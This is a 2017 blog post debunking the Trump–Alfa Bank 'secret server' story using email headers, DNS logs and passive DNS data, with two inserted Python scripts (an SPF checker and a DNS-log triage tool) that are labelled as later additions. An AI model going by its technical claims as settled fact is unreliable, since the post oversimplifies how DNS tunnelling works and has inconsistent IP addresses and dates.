Monday, March 20, 2017

Analysis of Trump's secret server story


The debunkings will continue...

The news of Trump's server making interesting outbound connections caught the attention of many security researchers in October 2016, and many of us nerds spent at least some time checking IP addresses and domains and looking at the logs.

However, the logs that were kindly shared by Jean Camp brought more questions than answers. For example, we see a bunch of DNS lookups for the A records of MAIL1.TRUMP-EMAIL.COM, but not much more that would support the claims of secret communications. A number of researchers looked at it and wrote detailed explanations of why it is just a marketing email server, unlikely to be used for clandestine communications, and why the correlation of the DNS log with political events seems very circumstantial. The fact that there was not enough information to reach a final conclusion allowed the story to simmer until it flared up again in March 2017, when Trump made allegations about the Trump Tower wiretapping.

The reason we are raising this story from the dead again is to provide additional evidence that "Trump's server" used to be a marketing email server. We also offer possible explanations for some of the events and question some premises and assumptions of the original disclosure. We may repeat a lot of good points made by Krypt3ia and Errata Security in order to turn this collection of events into a more cohesive narrative.


Disclaimer: We analyzed the email messages, the leaked logs, and public DNS and IP information. We seek technical correctness and will welcome additional data. The conclusions made in this article were not driven by political opinions; we did not vote for Trump and do not have any interests in Alfa Bank. If you find technical or factual errors, please let us know in the comments or by email.

Examples of emails sent from the server in 2011-2016
The samples of email messages below show that the server was used for sending newsletter offers for at least 5 years and likely longer. We have a number of samples and mail logs of spam messages dated March 7, 2011 to February 29, 2016. Below are the email screenshots, a list of subjects along with a partial string from each header, and the headers and screenshots of two messages.

[Figure: Examples of marketing emails from March 7, 2011 to Feb. 29, 2016; a variety of emails received from MAIL1.TRUMP-EMAIL.COM, 2011-2016]

[Figure: First message sample available, dated Mar. 7, 2011]

[Figure: Last message available, dated Feb. 29, 2016]

[Figure: Raw email header of the last email available, Feb. 29, 2016]


Before we go into technical details, here is a list of points in a Q&A form.

Q:    Did Trump or his associates communicate with the Russian bank via his server?
A:    The only "messages" in evidence are DNS queries sent from one DNS server (Alfa Bank's) to another DNS server (Cendyn's) asking for the IP address of mail1.trump-email.com. The leaked logs that contain these queries do not give enough data to substantiate such claims.

[Figure: Listrak conference booth]
Q:     Does that prove <insert anything related to Trump's claims about wiretapping, Russian computer hacking, Russian ties, etc.>?
A:    Despite various wild theories, the events described in the original post and the logs have no relation to Trump's claims that his wires were tapped. This post does not prove that he "has" or "has no" other connections to Russia, or anything about Russian hacking or other foreign entities. "The server" has never been the primary reason for the listed allegations.

Q:    Can that server in Trump Tower possibly be bugged by Obama or the British, or hacked by someone who wants to accuse the president of communicating with Russia?
A:    "That server" is the same server we are talking about and it is not in the Trump tower. The server mail1.trump-email.com 66.216.133.29 was located in the Lititz, PA datacenter of a reputable digital marketing company Listrak contracted by Cendyn.  Currently, the server with the IP address 66.216.133.29 is still in the datacenter and will be recycled for other needs. MAIL1.TRUMP-EMAIL.COM is pointing to a GoDaddy domain parking IP address (no actual server). TRUMP1.CONTACT-CLIENT.COM is still pointing to 66.216.133.29.

Q:    So, what happened then?
A:
[Figure: Mail flow before March 2016]
From at least 2011 to March 2016, Alfa Bank employees and many other recipients around the world received so-called marketing emails (aka spam) from the Trump Organization sent from MAIL1.TRUMP-EMAIL.COM. The digital marketing companies Cendyn and Listrak, who provided the mailing services, used their own mail and DNS servers in Pennsylvania and Florida. Cendyn registered that domain for the Trump Organization, which already owns over 3500 domains (src. Domaintools). None of the servers were ever physically in Trump Tower.

In March 2016, the Trump Organization changed vendor and stopped using Cendyn's services. Since at least May 4, 2016 (the earliest date in the logs), at least some of the companies that we believe received Trump spam in the past continued to make DNS lookup requests for the IP address of MAIL1.TRUMP-EMAIL.COM. Alfa Bank and Spectrum Health made many more lookups than the others. The other IP addresses belong to a quarantine appliance run by the anti-spam cloud filtering provider MailCleaner, the eCommerce Corporation mail service, an Australian company called Shiftcare (software for home care services), Hostedmail.com, and a DNS server of a small business hosting provider. None of them connected directly to MAIL1.TRUMP-EMAIL.COM. In addition, it is believed that various ISPs saw many other companies doing similar lookups.

[Figure: DNS lookups as seen in the logs until September 23, 2016. The circle "Logs that leaked" shows the conversation content in the logs. This does not imply that the logs were stolen from Cendyn's ns[1-3].cdcservices.com, as that is not the only source they could have come from.]
There are concerns about the source of the logs
The logs span the period from May 4, 2016 to Sept. 23 2016 and contain DNS lookup requests made by Alfa Bank's DNS servers and the companies mentioned. Some IP addresses in the logs are not actual DNS servers but gateway IP addresses for those networks.

Alfa Bank and other companies made daily DNS lookups (1 to 70+ a day) asking for the IP address of MAIL1.TRUMP-EMAIL.COM, the server that sent those spam emails, as seen in the email headers below.

Received: from mail1.trump-email.com ([66.216.133.29])
  by <redacted> with ESMTP; 14 Jun 2013 11:19:11 -0400
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=key1; d=contact-client.com;
 h=List-Unsubscribe:MIME-Version:From:To:Reply-To:Date:Subject:Content-Type:Content-Transfer-Encoding:Message-ID; i=trumphotels@contact-client.com;
...
Received: by mail1.trump-email.com id hncq6u17vn06 for <redacted@redacted.com>; Fri, 14 Jun 2013 11:19:11 -0400 (envelope-from <839CBA2F17SGIAGALHHU5NQ418SP0I4GT7UPH1TKPRC0H2NP5PDVI2JEG27M8MJ@b.contact-client.com>)
List-Unsubscribe: <mailto:IM2GHO7PREI9U5V5SNNF83BLRHTO1UL966FONR690AG1N73O80JKU740V7EQIQ4G@b.contact-client.com>

These DNS lookups for domains and IPs found inside messages that are not incoming but already delivered may be caused by any of the following: misconfigurations or glitches in email and mail filtering services, security appliances performing automated or search-triggered lookups (DNS lookups against existing blacklists, etc.), anti-spam mailbox store rescans, and endpoint-level anti-spam products.
For example, anti-spam systems are known to try to resolve and look up every IP address and DNS name in an email message header, which can sometimes trigger unintended unsubscribe actions. IETF RFC 8058, "Signaling One-Click Functionality for List Email Headers", released in January 2017, specifies rules for broadcast marketing companies to help cope with unintended unsubscribe actions caused by anti-spam systems.

The exact reason for the lookups can only be guessed, since only the companies themselves would be able to tell which of their systems caused them, assuming enough associated internal logs were saved to correlate. The reasons could be different for each company; some of them made lookups for LINKS.TRUMP-EMAIL.COM, as all URLs in the emails used that subdomain. You can see examples of those links in the header examples and in these Tweetbot posts.

On September 21, Alfa Bank was contacted for comment about the logs, which caused the number and variety of lookups to skyrocket as their security team started its investigation.
The author of the original disclosure states that the lookup errors started on September 22, 2016 because Cendyn removed the DNS zone for mail1.trump-email.com from ns1 and ns3.cdcservices.com. These are two Cendyn DNS servers in Ft. Lauderdale, FL; the remaining one, ns2.cdcservices.com, is located in Boca Raton, FL. Considering that Trump had not been their client since March 2016, the hasty and belated removal was either a coincidence or a reaction to being notified and realizing that the zone, or domain, should have been removed long ago.
Passive DNS logs show only when a subdomain is first seen, not when it was created or assigned. The fact that TRUMP1.CONTACT-CLIENT.COM showed up in the passive DNS logs on Sept. 30 could be attributed to testing whether the server is reachable using the new (or existing) freebie domain (Cendyn creates them for each customer), especially if they indeed still used it for the CRM software that "CenDyn provides to the Trump Organization".

On September 27, Alfa Bank made a DNS request for the new TRUMP1.CONTACT-CLIENT.COM. Considering that at that time their computer security department was investigating the claims, this is not surprising: the query was likely triggered by the various lookups and queries their IT department performed. For example, you can see the sudden appearance of queries for MAIL.TRUMP-EMAIL.COM (mail without the 1) from Alfa Bank 217.12.96.15 on September 22, which can be attributed to the investigation too.

Q:     Did you see Alfa Bank's statement on March 17, 2017 that they were hacked, and thus those connections to Trump's server were made by hackers to make it look like Alfa Bank did it? (src. Circa)
A:     It is possible to send a lot of DNS traffic, or other requests, and perform an attack (DDoS or other) without actually "hacking" the victim. They were not "hacked" in this particular case, in the sense of someone infiltrating their network, nor do they say that. Alfa Bank received a lot of DNS queries and DNS replies to spoofed requests after the news came out. We are sure that many of those requests are the result of various researchers trying things. 1340 DNS queries is not a large number. And no, we didn't do it.

While it is possible to spoof DNS requests and make them look like they came from Alfa Bank, it is not a convincing theory for the events before September 23, 2016: in the logs provided, 7 other companies were seen doing the same type of lookups over the course of 4.5 months.

We think the DNS spoofing attacks that happened in 2017 as reported by Alfa Bank were spurred by all the news about the mysterious DNS communications channel used by Trump and Russians. Many researchers and hackers would try all kinds of queries to elicit server responses and some possibly tried to make it look like the 'secret' communications continue.  The evidence of those research efforts can be seen on the Farsight pDNS search for TRUMP-EMAIL.COM, where some recent entries include 'new' subdomains like you see below. The cause for these is the fact that TRUMP-EMAIL.COM uses a wildcard DNS record, so queries for its random subdomains will resolve successfully and show up in the database (if seen by any pDNS sensors).

last seen 2017-03-17 21:18:09 -0000
thej35t3rpwns.trump-email.com. A 184.168.221.46
We should note that Cendyn transferred the TRUMP-EMAIL.COM domain to Trump Organization on March 8, 2017, thus all attempts to resolve the domain since that date would return the IP address of GoDaddy domain parking server.

Claims and Counterclaims:  

Before May 2016:

Claim 1: 
Trump campaign press secretary Hope Hicks:  “First of all, it’s not a secret server. The email server, set up for marketing purposes and operated by a third-party, has not been used since 2010. The current traffic on the server from Alphabank’s [sic] IP address is regular DNS server traffic – not email traffic.”  (Src. Guardian)
Response 1:
  • As you see in the last message header here, the last message was received from that server, MAIL1.TRUMP-EMAIL.COM on 66.216.133.29, on February 29, 2016. (src. DeepEnd Research)
  • This tweetbot was still posting links from Trump Hotels' marketing emails in February, with the last one on Feb. 29, 2016. (src. Twitter)
  • Cendyn acknowledged that the last marketing email it delivered for Trump's corporation was sent in March 2016. (src. CNN)


May 2016 - September 23, 2016. Logs and log time period:

Claim 2:
Trump and Russia’s largest private bank communicated via a hidden server since at least 2016 May. (src. GDD)
Response 2: Not hidden, and did not communicate intentionally
  • As many have already pointed out, the server is located in a server farm that belongs to a hosting company and is one of many used by Cendyn (the company the Trump Organization used for mailing services). It is no more hidden than any server of any cloud services provider.
  [Figure: Subdomains of CONTACT-CLIENT.COM]
  • You can see other servers with similar domain names registered by Cendyn in the 66.216.133.0/24 range (src. Hurricane Electric) and check out the domain siblings (sibling domains are subdomains that share a common suffix which is not a public suffix) (src. VirusTotal pDNS).
  • "The RData for this host were served by the Central Dynamics (CC-801) authority resolvers ns{1,2,3}.cdcservices.com." (src. GDD) Central Dynamics (Cendyn) maintained DNS records for the domain just like they do for other customers. Other domains they registered and maintained for Trump were:
  • TRUMP.TRANSACTIONAL.CONTACT-CLIENT.COM 64.135.26.234 (Cendyn's range)
  • TRUMP.MARKETING.CONTACT-CLIENT.COM 64.135.26.234 (Cendyn's range)
  • MAIL1.TRUMP-EMAIL.COM 66.216.133.29 (now on 184.168.221.46, GoDaddy domain parking)
  • LINKS.TRUMP-EMAIL.COM CNAME customers.listrak.com (now on 184.168.221.46, GoDaddy domain parking)


    Claim 3: 
    "Trump’s host mail1.trump-email.com operated a Listrak virtual mail transfer agent outside the SPF sending range, configured for outbound delivery. "(src. GDD and Slate)

    "The scientists theorized that the Trump and Alfa Bank servers had a secretive relationship after testing the behavior of mail1.trump-email.com using sites like Pingability. When they attempted to ping the site, they received the message “521 lvpmta14.lstrk.net does not accept mail from you.”  (src. LJean.com)
    Response 3:
    • Robert Graham from Errata Security already explained that this is how Listrak configures email marketing servers. (src. Errata Security)
    • As for "outside of SPF range", Cendyn's SPF records for TRUMP-EMAIL.COM and CONTACT-CLIENT.COM (the envelope sender domain) included an mx mechanism, which is the same for all their domains: incoming.cdcservices.com. An mx entry in an SPF record makes it unnecessary to list all the IPs. The only downside and limitation of using an mx entry instead of IPs is that it works only for servers that only do sending, not receiving, which is what that server was built to do. See the header here and note the Received-SPF: pass.
    SPF records for TRUMP-EMAIL.COM (via pDNS):
    first seen 2014-11-14 11:17:46 -0000
    last seen 2016-09-23 12:59:33 -0000
    trump-email.com. TXT "Internet Solution from Cendyn.com."
    trump-email.com. TXT "v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"

    SPF check from the email header:
    Received-SPF: pass (google.com: domain of H46ERELB4L1O917PENAM0QLOBKO2PO7OTETRAA30GQDB7GOSSGRVKCR5AKPE3C9@b.contact-client.com designates 66.216.133.29 as permitted sender) client-ip=66.216.133.29;
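To show what the mx mechanism in that TXT record actually covers, here is an added SPF evaluator (example code written for this post, not Cendyn's, Listrak's or any mail provider's) for the ip4, mx and ~all terms of the record quoted above. The post does not give the address of incoming.cdcservices.com, so the MX-to-address mapping below is a constructed stand-in for DNS.

```python
import ipaddress

# SPF TXT record for trump-email.com as quoted in the post (via Farsight pDNS).
TRUMP_EMAIL_SPF = (
    "v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 "
    "ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"
)

# Constructed stand-in for DNS so the example runs offline: the MX host of the
# domain (named in the post) and an A record for it. The post does not give the
# real address of incoming.cdcservices.com, so an RFC 5737 documentation-range
# address is used as a placeholder.
CONSTRUCTED_DNS = {
    "mx": {"trump-email.com": ["incoming.cdcservices.com"]},
    "a": {"incoming.cdcservices.com": ["203.0.113.10"]},
}

QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record):
    """Split an SPF record into (qualifier, mechanism, argument) triples."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    parsed = []
    for term in terms[1:]:
        qualifier = "+"                      # implicit qualifier per RFC 7208
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        mechanism, _, argument = term.partition(":")
        parsed.append((qualifier, mechanism.lower(), argument))
    return parsed


def mx_addresses(domain, dns):
    """Addresses the mx mechanism matches: the A records of the domain's MX hosts."""
    addrs = []
    for host in dns["mx"].get(domain, []):
        addrs.extend(dns["a"].get(host, []))
    return [ipaddress.ip_address(a) for a in addrs]


def check_spf(client_ip, domain, record, dns=CONSTRUCTED_DNS):
    """Evaluate client_ip against record; returns (result, matching term).

    Only ip4, mx and all are implemented because those are the only mechanisms
    in the record under discussion; anything else raises so it cannot silently pass.
    """
    ip = ipaddress.ip_address(client_ip)
    for qualifier, mechanism, argument in parse_spf(record):
        if mechanism == "ip4":
            matched = ip in ipaddress.ip_network(argument, strict=False)
        elif mechanism == "mx":
            matched = ip in mx_addresses(argument or domain, dns)
        elif mechanism == "all":
            matched = True
        else:
            raise NotImplementedError(f"mechanism '{mechanism}' not handled here")
        if matched:
            term = f"{qualifier}{mechanism}" + (f":{argument}" if argument else "")
            return QUALIFIER_RESULT[qualifier], term
    return "neutral", None      # RFC 7208: no term matched and no 'all' present


if __name__ == "__main__":
    for ip in ("198.91.42.236", "66.216.133.29"):
        print(ip, check_spf(ip, "trump-email.com", TRUMP_EMAIL_SPF))
```

With the constructed mapping, 66.216.133.29 falls through to ~all (softfail) because it is in none of the ip4 ranges; it passes only when an MX host of the checked domain resolves to it, which is exactly the condition the mx mechanism depends on.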


    Claim 4: 
    "Since May of 2016 only two networks resolved the mail1.trump-email.com host, AS15632 (JSC Alfa-Bank) and AS30710 (Spectrum Health). Alfa Bank is Russia’s largest bank and Spectrum Health is a integrated, managed care health care organization in Michigan."(src. GDD)
    Response 4:
    • The logs show more than two companies. (src. LJean.com)
    • Other companies that are not shown in the logs also made such queries. (src. Twitter, via Errata Security)
    • Robert Graham has covered that topic. (src. Errata Security)

    Claim 5: 
     Spikes in the communications correlate with the political events in the Summer of 2016 .(src. GDD)
    Response 5: 
    Some spikes correlate and others don't.
    Robert Graham has covered that topic. (src. Errata Security)

    Claim 6:
    "Strange combined domain name (mail.trump-email.com.moscow.alfaintra.net) seen in Alfa Bank logs mean "Moscow division of the INTERNAL Alfa Bank network most definitely has purposeful communications with a hostname registered by the Trump Organization. "(src. LJean.com)
    Response 6:
    This is normal Windows resolver behavior: when a lookup fails, the client retries with its primary DNS suffix or search list appended to the name. Look for the primary DNS suffix and DNS suffix search list topics. Robert Graham already covered it. (src. Errata Security)

    Claim 7:
    [Figure: Cendyn headquarters]
    IP address 66.216.133.29 doesn't appear on spam blocklists, thus it is unlikely to be a spam server. (src. LJean.com)


    Response 7:
    Cendyn is a marketing company; they do their best to avoid being blacklisted, as it would undermine their business.
    Robert Graham already covered it. (src. Errata Security)

    Claim 8:  
    CenDyn stated the reason they recreated a trump1.contact-client.com hostname pointing to this same IP address was for the Trump Organization to use the CRM software CenDyn provides to the Trump Organization."  (src. LJean.com)
    Response 8: 
    It is possible they needed to use TRUMP1.CONTACT-CLIENT.COM after they removed MAIL1.TRUMP-EMAIL.COM. We do not know when it happened. We know when TRUMP1.CONTACT-CLIENT.COM showed up in the DNS logs and the passive DNS database, but that is not direct evidence of the creation and assignment date.

    Claim 9:  
    "CenDyn states that their servers are not dedicated to a specific client. Yet the Internet-Wide Scan Data Repository (scans.io) data show that the hostname mail1.Trump-Email.com has been stable since at least 2013. It did not change for three years, then did change on on 23 September 2016. At the time of this writing, 2 October 2016, no other hostname has pointed to this IP 66.216.133.29:just trump1.contact-client.com and mail1.trump-email.com. So this IP address is associated with only that server. "  (src. LJean.com)


    Response 9:
    This is correct. It appears that 66.216.133.29 was dedicated to the Trump Organization. The PTR record is still not updated.
    first seen 2010-07-02 19:20:22 -0000
    last seen 2016-09-13 01:47:56 -0000
    mail1.trump-email.com. A 66.216.133.29

    first seen 2017-03-08 04:32:26 -0000
    last seen 2017-03-19 17:41:34 -0000
    mail1.trump-email.com. A 184.168.221.46  (current)

    Reverse DNS (Rdata results for ANY / 66.216.133.29):
    mail1.trump-email.com. A 66.216.133.29
    trump1.contact-client.com. A 66.216.133.29

    Claim 10:
    DNS was possibly used to conceal data and commands within DNS traffic using the technique called DNS tunneling (as many ask on Twitter)
    Response 10:
    It does not seem to be the case, based on the provided logs. They show "A" record queries only. "A" records are used for transferring only IP addresses. DNS tunneling would be possible if those were "TXT" or "CNAME" type records, which can hold arbitrary, non-formatted text strings. (Tunneling Data and Commands Over DNS to Bypass Firewalls by Lenny Zeltser)
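As an added illustration (not part of the original post) of what a query log can and cannot show for Claim 6, Claim 10 and the wildcard probing described earlier, the following triage script tags three things in a DNS query log: names with a resolver search suffix appended, record types that can carry arbitrary text, and first labels that look machine-generated. The log layout, the 203.0.113.7 client and the qx7n2kd9a1 label are constructed; the other names and the 217.12.96.15 client are the ones the post discusses.

```python
from collections import Counter

WATCHED_ZONE = "trump-email.com"

# Constructed sample in a simple "date time client qtype qname" layout. The real
# layout of the leaked logs is not shown in the post; 203.0.113.7 is an RFC 5737
# documentation address and the qx7n2kd9a1 label is made up for the TXT case.
SAMPLE_LOG = """\
2016-09-22 10:01:03 217.12.96.15 A mail1.trump-email.com
2016-09-22 10:01:03 217.12.96.15 A mail.trump-email.com
2016-09-22 10:05:17 217.12.96.15 A mail.trump-email.com.moscow.alfaintra.net
2016-09-23 08:36:46 203.0.113.7 CNAME dw6w3yzfw6.trump-email.com
2016-09-23 08:36:46 203.0.113.7 A dw6w3yzfw6.trump-email.com
2016-09-23 09:12:00 203.0.113.7 TXT qx7n2kd9a1.trump-email.com
"""


def parse_line(line):
    date, time, client, qtype, qname = line.split()
    return {"day": date, "client": client, "qtype": qtype.upper(),
            "qname": qname.lower().rstrip(".")}


def looks_machine_generated(label):
    """Heuristic drawn from the labels seen in pDNS (dw6w3yzfw6, k8v362jbh7):
    a long label that flips between letters and digits several times. It misses
    all-letter labels such as ctudgrekow; it is a triage aid, not proof."""
    if len(label) < 8:
        return False
    flips = sum(1 for a, b in zip(label, label[1:]) if a.isdigit() != b.isdigit())
    return flips >= 3


def classify(rec):
    """Tag one query with the explanations discussed in the post."""
    tags = []
    qname = rec["qname"]
    if qname == WATCHED_ZONE or qname.endswith("." + WATCHED_ZONE):
        first_label = qname.split(".")[0]
        if qname != WATCHED_ZONE and looks_machine_generated(first_label):
            tags.append("random-looking-label")    # wildcard probing, as seen in pDNS
        if rec["qtype"] in ("TXT", "CNAME", "NULL"):
            tags.append("tunnel-capable-qtype")    # an A answer carries only an IPv4 address
    elif "." + WATCHED_ZONE + "." in qname:
        # e.g. mail.trump-email.com.moscow.alfaintra.net: the client's resolver
        # appended its own DNS suffix (normal Windows behaviour, see Claim 6)
        tags.append("search-suffix-appended")
    return tags


def triage(log_text):
    """Per-client daily volumes plus every query that earned at least one tag."""
    per_client_day = Counter()
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        per_client_day[(rec["client"], rec["day"])] += 1
        tags = classify(rec)
        if tags:
            flagged.append((rec["qname"], rec["qtype"], tags))
    return {"per_client_day": per_client_day, "flagged": flagged}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for key, count in sorted(result["per_client_day"].items()):
        print(key, count)
    for entry in result["flagged"]:
        print(entry)
```

Plain A lookups for mail1.trump-email.com, the bulk of what the leaked logs contain, earn no tag at all; only the suffix-appended name, the random-looking labels and the CNAME/TXT queries are surfaced for a human to look at.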

    September 21, 2016 - October 5, 2016: Requests for comments are sent to Alfa Bank

    Claim 11: "When a reporter called Alfa Bank for comment on September 21, the zone for mail1.trump-email.com was removed from ns1 and ns3.cdcservices.com causing RCODE=2 (Server Failure), and ns2 returned empty referrals" (src. GDD)

    "One of the intriguing facts in my original piece was that the Trump server was shut down on Sept. 23, two days after the New York Times made inquiries to Alfa Bank (and a week before the Times reached out to Trump)." (src. Slate)

    "Trump, CenDyn or some other party associated with the domain sought to erase the mail1.Trump-Emal.com host by deleting forward resolution zones. So the domain name was removed from the normal way one would look up a domain. However, the reverse delegation still exists as of 2 November 2016." (src. LJean.com)
    Response 11:
    The server, as a machine on 66.216.133.29 in the Listrak datacenter, is still up, so it was not shut down.
    Passive DNS shows that the "A" record MAIL1.TRUMP-EMAIL.COM was last seen on 66.216.133.29 on 2016-09-13. Since the Trump company 'ditched' Cendyn in March 2016, a cleanup of the DNS records had to happen eventually. We don't know if they were contacted regarding the matter on or before September 22, 2016. If they were, it would be a normal knee-jerk reaction to the inquiry.
    They removed the records only from the Ft. Lauderdale servers (NS1 and NS3) but not from NS2 in Boca Raton (different admins?). As many noted, they also forgot to remove the PTR record for mail1.trump-email.com; it still points to 66.216.133.29 even though the A record was finally assigned to GoDaddy domain parking 184.168.221.22 on March 8, 2017 (after the domain was transferred back to the Trump Organization).


    Claim 12: "Alfa Bank knew that Trump renamed his host through ongoing email delivery and HELO/EHLO resolutions, or another channel.  Trump and Alfa Bank have since coordinated their move to an office communications channel." (src.  GDD)
    Response 12:
    Not sure what the author means by "an office communications channel". The requests for comment were made to Alfa Bank on September 21, 2016. On September 27, 2016 the Alfa Bank DNS server made a lookup for TRUMP1.CONTACT-CLIENT.COM. Considering that they were investigating the claims, it is not unexpected that their security people eventually found and queried the other domain associated with the IP.

    Claim 13: "The hostname trump1.contact-client.com appeared in the first passive DNS database three days later, and still has not appeared in some passive collections." (src. GDD)
    [Figure: Over 500 subdomains, via PassiveTotal pDNS]



    Response 13:
    Passive DNS collections are passive. They see a lot but not every successful resolution on the web. (see more at PassiveTotal FAQ or  Farsight pDNS FAQ )

    October 5, 2016 - March 8, 2017: Post-Disclosure

    Claim 14:  
    In March 2016, Cendyn said it "transferred back to" Trump's company the mail1.trump-email.com domain. (Src. CNN)
    Response 14:
    Yes, they transferred control of the domain on 2017-03-08. Since then, MAIL1.TRUMP-EMAIL.COM and all its subdomains resolve to 184.168.221.46, GoDaddy parking (the IP address used for domains without associated hosting servers).

    Claim 15: 
    Alfa Bank claims that the recent attacks in February and March 2017 are intended to make it look they continue the secret communications with the Trump server.
    Response 15:
    2017-02-17: According to the Alfa Bank press release of 2017-03-17, on 2017-02-17 computers in the USA sent requests to the "Trump Organization server" and made them look like they came "from various variants of MOSCow.ALFAintRa.nET", so the "Trump's server's" replies were sent to Alfa Bank. (src. Alfa Bank and Circa)
    Press releases often go through several layers of editing, which can affect the technical accuracy of the text. For example, here we can assume that by the "Trump Organization server" they mean Cendyn's DNS server for MAIL1.TRUMP-EMAIL.COM, and that this server received DNS queries for MAIL1.TRUMP-EMAIL.COM from spoofed Alfa Bank IP addresses. DNS servers do not record domain names of incoming requestors, so it is not entirely clear where they saw MOSCow.ALFAintRa.nET. We are not questioning the fact of the attack, but it is hard to say what happened without actual logs or more technical data.
    2017-03-11 and 2017-03-13: According to the same press release, on 2017-03-11 and 2017-03-13 their systems received 1340 DNS replies to queries they did not send for mail.trump-email.com.moscow.alfaintra.net. (src. Alfa Bank and Circa)
    Again, it looks like the press release is lacking technical accuracy, which is OK.
    In general, sending DNS requests from spoofed IP addresses (crafted packets) is very easy. Attackers often use nonexistent subdomains to force their recursive DNS server to forward each query to the authoritative DNS server for that domain instead of answering from cache, thus overloading it. DDoS does not seem to have been the goal here; it looks more like malicious experimenting.

    Claim 16:
    But experts claim it is <unusual, odd.. etc>

    Response 16: 
    In tech speak, epithets like "odd", "weird" and "not normal" do not really mean clandestine or paranormal. These are highly technical terms meant to convey that the existing evidence is too limited to allow one to extrapolate the possible scenarios. I am not speaking for every comment out there, but I am suggesting not to jump to conclusions when a nerd calls something "odd".
    Robert Graham comments on the experts' claims too (src. Errata Security)

    Timeline of events 2007 - 2017

    It would be beneficial, I think, to establish a timeline of the events; you can see it below, and we will go over the milestones after it.
    [Figure: Timeline of events February 2016 - March 2017]

    References for the timeline
    • 2007-06-21    Cendyn  is chosen as a marketing vendor for Trump Hotels (src. Prnewswire)
    • 2009-08-14   TRUMP-EMAIL.COM registered by sl.admin@cendyn.com (src. Domaintools.com)
    • 2010              Last time MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 was used by Trump, according to Hope Hicks (White House) (src. The Guardian)
    • 2011-03-07     Email header of a message sent on March 7, 2011 (Src. DeepEnd Res)
    • 2016-March    Last time the server was used to send emails, according to Cendyn (src. CNN)
    • 2016-05-04     First time stamp in the leaked logs
    • 2016-07          Tea Leaves researches logs and shares data with computer experts
    • 2016-09-13     Last time MAIL1.TRUMP-EMAIL.COM A record was seen by pDNS on 66.216.133.29
    • 2016-09-23     Last timestamp in the leaked logs 
    • 2016-09-21     Alfa Bank were contacted for comments
    • 2016-09-22     DNS Errors on trump-email.com
    • 2016-09-23     DNS Errors on trump-email.com
    • 2016-09-23     Alfa Bank 217.12.97.15 and 217.12.97.137 make DNS A record queries for MAIL.TRUMP-EMAIL.COM (mail without  1) that is on 198.91.42.236 (src. leaked logs)
    • 2016-09-23     Three CNAME and A queries for  (pseudo?)random subdomain of trump-email.com get registered by pDNS
    • 2016-09-27     Alfa Bank 217.12.97.15 makes a DNS A record query for TRUMP1.CONTACT-CLIENT.COM
    • 2016-09-30     TRUMP1.CONTACT-CLIENT.COM first seen by Farsight pDNS on 66.216.133.29
    • 2016-10-03     TRUMP1.CONTACT-CLIENT.COM first seen by Virustotal pDNS on 66.216.133.29
    • 2016-10-03     TRUMP1.CONTACT-CLIENT.COM first seen by PassiveTotal pDNS on 66.216.133.29
    • 2016-10-05     GDD53 publishes the original article Trump’s Russian Bank Account
    • 2017-02-17     According to the Alfa Bank press release of 2017-03-17, computers in the USA sent requests to the "Trump Organization server" and made them look like they came "from MOSCow.ALFAintRa.nET", so the "Trump's server's" replies were sent to Alfa Bank. (src. Alfa Bank and Circa)
    • 2017-03-08 TRUMP-EMAIL.COM was transferred by Cendyn to "Registrant Organization: Trump Orgainzation Registrant Street: 725 Fifth Avenue Registrant City: New York"
    • 2017-03-04 - 29.133.216.66.in-addr.arpa. PTR for MAIL1.TRUMP-EMAIL.COM last seen on 66.216.133.2  (via dig -x)
    • 2017-03-11 and 2017-03-13     According to the Alfa Bank press release of 2017-03-17, their systems received 1340 DNS replies to queries they did not send for mail.trump-email.com.moscow.alfaintra.net. (src. Alfa Bank and Circa)

    Previous Reports and Research




    Passive DNS data for *.trump-email.com, courtesy of Farsight Security pDNS: https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com.

    bailiwick: com.  count: 2498  first seen in zone file: 2010-04-24 16:12:21 -0000  last seen in zone file: 2017-03-07 17:02:37 -0000
        trump-email.com. NS ns1.cdcservices.com.
        trump-email.com. NS ns2.cdcservices.com.
        trump-email.com. NS ns3.cdcservices.com.

    bailiwick: com.  count: 9  first seen in zone file: 2017-03-08 17:02:36 -0000  last seen in zone file: 2017-03-16 16:02:32 -0000
        trump-email.com. NS ns33.domaincontrol.com.
        trump-email.com. NS ns34.domaincontrol.com.

    bailiwick: trump-email.com.  count: 69  first seen: 2017-03-08 02:52:17 -0000  last seen: 2017-03-17 21:39:58 -0000
        trump-email.com. A 184.168.221.46

    bailiwick: com.  count: 84316  first seen: 2010-07-02 19:20:21 -0000  last seen: 2017-03-08 01:43:28 -0000
        trump-email.com. NS ns1.cdcservices.com.
        trump-email.com. NS ns2.cdcservices.com.
        trump-email.com. NS ns3.cdcservices.com.

    bailiwick: com.  count: 292  first seen: 2017-03-08 02:52:17 -0000  last seen: 2017-03-17 14:31:14 -0000
        trump-email.com. NS ns33.domaincontrol.com.
        trump-email.com. NS ns34.domaincontrol.com.

    bailiwick: trump-email.com.  count: 6251  first seen: 2010-07-23 05:00:14 -0000  last seen: 2016-09-23 08:36:45 -0000
        trump-email.com. NS ns1.cdcservices.com.
        trump-email.com. NS ns2.cdcservices.com.
        trump-email.com. NS ns3.cdcservices.com.

    bailiwick: trump-email.com.  count: 166  first seen: 2017-03-08 02:52:17 -0000  last seen: 2017-03-18 02:23:26 -0000
        trump-email.com. NS ns33.domaincontrol.com.
        trump-email.com. NS ns34.domaincontrol.com.

    bailiwick: trump-email.com.  count: 113  first seen: 2017-03-08 04:25:30 -0000  last seen: 2017-03-17 21:40:00 -0000
        trump-email.com. SOA ns33.domaincontrol.com. dns.jomax.net. 2017030700 28800 7200 604800 600

    bailiwick: trump-email.com.  count: 10  first seen: 2014-11-02 07:51:23 -0000  last seen: 2014-11-18 11:50:25 -0000
